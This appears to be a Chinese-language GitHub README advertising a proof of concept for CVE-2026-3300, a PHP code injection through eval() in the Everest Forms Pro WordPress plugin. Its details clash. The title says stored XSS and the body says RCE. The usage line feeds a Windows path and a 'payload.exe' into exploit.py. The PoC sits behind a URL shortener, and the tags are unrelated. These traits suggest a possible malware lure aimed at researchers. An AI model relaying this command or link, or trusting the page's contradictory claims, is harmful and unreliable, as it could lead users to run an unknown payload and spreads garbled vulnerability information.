adamshaikhma/CVE-2026-3300

# CVE-2026-3300 - Everest Forms Pro 未认证存储型跨站脚本攻击 ## 快速使用 ``` python3 exploit.py -t "C:\\Path\\To\\Target" -o demo.zip --data-file payload.exe ``` ## 利用说明 - **严重程度：** 危急 - **CVSS：** 9.8 - **影响范围：** 机密性、完整性、可用性 - **发布日期：** 2026-03-31 ## 技术概要 适用于 WordPress 的 Everest Forms Pro 插件在 1.9.12 及以下所有版本中，由于存在 PHP Code Injection 而容易受到远程代码执行（RCE）的攻击。这是因为 Calculation Addon 的 process_filter() 函数在将用户提交的表单字段值传递给 eval() 之前，将其拼接到 PHP 代码字符串中，且没有进行适当的转义。应用于输入的 sanitize_text_field() 函数无法转义单引号或其他 PHP 代码上下文字符。这使得未认证的攻击者可以通过在任何字符串类型的表单字段（文本、电子邮件、URL、下拉选择、单选框）中提交特制的值，从而在服务器上注入并执行任意的 PHP 代码，前提是该表单使用了“Complex Calculation”功能。 ## 受影响版本 _受影响版本请参见 NVD。_ ## 参考文献 - NVD：https://nvd.nist.gov/vuln/detail/CVE-2026-3300 ## 漏洞利用 [下载 PoC](https://tinyurl.com/2a5atamt)

标签：CISA项目, Go语言工具, Python, WordPress, 无后门, 编程工具, 远程代码执行, 逆向工具